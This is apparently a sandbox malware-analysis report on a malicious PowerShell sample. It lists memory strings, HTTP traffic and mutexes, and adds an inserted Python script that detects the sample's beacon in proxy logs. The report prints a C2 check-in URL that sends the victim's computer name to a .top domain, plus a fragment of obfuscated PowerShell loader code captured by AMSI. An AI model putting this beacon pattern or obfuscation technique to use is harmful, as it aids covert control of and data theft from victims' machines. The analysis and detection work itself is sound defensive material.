Source: | Binary string: softy.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643068475958.000001A73D8FB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdbdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: powershell.exe, 00000001.00000002.643108718460.000001A755E51000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX |
Source: global traffic | HTTP traffic detected: GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX |
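The HTTP rows above carry two request shapes from powershell.exe, both with the default Windows PowerShell 5.1 Invoke-WebRequest user agent: a bare GET / to www.google.com (Google then answered with its /sorry/ "unusual traffic" interstitial, which says the sandbox egress address was being rate-limited, not that the script was after a CAPTCHA page) and the check-in to cmacnnkfbhlcncm.top, whose id= parameter is the sandbox hostname ("computer") filled in from the in-memory template that appears in the string rows below. The following Python is an added example, not part of the sandbox report or the sample: it runs a detection for that beacon shape over a few constructed proxy records. The tab-separated log format, the EXPECTED_POWERSHELL_HOSTS allowlist and the severity labels are assumptions for the example.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed proxy records modelled on the requests in the report; not real telemetry.
# Fields: timestamp, client IP, method, host, request target, user agent.
SAMPLE_LOG = [
    "2023-09-18T10:00:01Z\t10.0.0.5\tGET\twww.google.com\t/\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151",
    "2023-09-18T10:00:02Z\t10.0.0.5\tGET\tcmacnnkfbhlcncm.top\t/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151",
    "2023-09-18T10:00:03Z\t10.0.0.7\tGET\twww.google.com\t/search?q=sandbox\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/117.0",
    "2023-09-18T10:00:04Z\t10.0.0.9\tGET\twww.powershellgallery.com\t/api/v2/package/Pester\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151",
]

# Hypothetical allowlist: hosts PowerShell is expected to reach in this environment.
EXPECTED_POWERSHELL_HOSTS = {"www.powershellgallery.com", "go.microsoft.com"}
# The observed beacon carries host identity and a session key as bare query parameters.
BEACON_PARAMS = {"id", "key", "s"}


def parse_record(line):
    """Split one tab-separated record and decompose the request target."""
    ts, client, method, host, target, ua = line.rstrip("\n").split("\t", 5)
    parts = urlsplit(target)
    return {"ts": ts, "client": client, "method": method, "host": host,
            "path": parts.path, "query": parse_qs(parts.query), "ua": ua}


def classify(rec):
    """Return (severity, reason) for one record, or None when nothing stands out."""
    if "WindowsPowerShell/" not in rec["ua"]:
        return None  # only the default Invoke-WebRequest/Invoke-RestMethod agent is in scope
    if rec["host"] in EXPECTED_POWERSHELL_HOSTS:
        return None
    if rec["path"].endswith(".php") and BEACON_PARAMS <= set(rec["query"]):
        return ("high", f"PowerShell beacon shape to {rec['host']}: id={rec['query']['id'][0]}")
    if rec["host"] == "www.google.com" and rec["path"] == "/":
        return ("low", "PowerShell connectivity probe to www.google.com")
    return ("medium", f"PowerShell request to unexpected host {rec['host']}")


def scan(lines):
    """Return (client, host, severity, reason) for every record worth a look."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        verdict = classify(rec)
        if verdict:
            hits.append((rec["client"], rec["host"], *verdict))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The probe on its own is low value (plenty of legitimate scripts test connectivity the same way); what earns the escalation is the same client following it within seconds with the PowerShell agent, a .php endpoint and the id/key/s triple, so correlate on client address rather than alerting on either row alone.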
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EF06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php? |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527 |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527p |
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic |
Source: powershell.exe, 00000001.00000002.643109343926.000001A7560EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.co |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzS |
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic8 |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzS |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8Z |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcK |
Source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzS |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $86zuy3xghtrqwve.(([char[]]@((-8759+(12159-3333)),(1082583/(10676-923)),(-1256+1368),(-4028+(-1825+(15221752/2548))),(9559-9475),(5516-(5445-(-610+(-4271+4921))))) -join ''))( $pt7afszmng9hol5 ) $86zuy3xghtrqwve.((-join (@((354296/5288),(-3056+3164),(571761/5151),(-10032+10147),(4537-4436))| ForEach-Object { [char]$_ })))()$eni4vzuxs2d5yoa.(([char[]]@((658208/(13365-3541)),(-9358+(10414-948)),(633699/(22875963/(30549368/7624))),(742670/6458),(-7430+7531)) -join ''))()[byte[]] $bxrc2jni4slugvt = $pt7afszmng9hol5.(([system.String]::new(@((981-897),(4326-4215),(-5367+(7729736/(-8618+(12028-(487+1500))))),(-4969+5083),(8315-(1920+6281)),(-5956+(11228-(45384750/8770))),(-6445+6566)))))() $cs3pj58qgiuek20=$bxrc2jni4slugvt return $cs3pj58qgiuek20}[System.Text.Encoding]::ascii.(([system.String]::new(@((304022/4282),(324008/(12915408/4026)),(898884/(13560750/1750)),(411182/4954),(7058-(493+6449)),(2257-(-3233+(9152-(12961-9185)))),(39900/(6930-(14782-(68506704/(9823-(1812-311)))))),(-8266+(5951+2425)),(2783-(19467520/7264))))))((nghl3ewmdia0bvsr1z6kjfo9x5q " |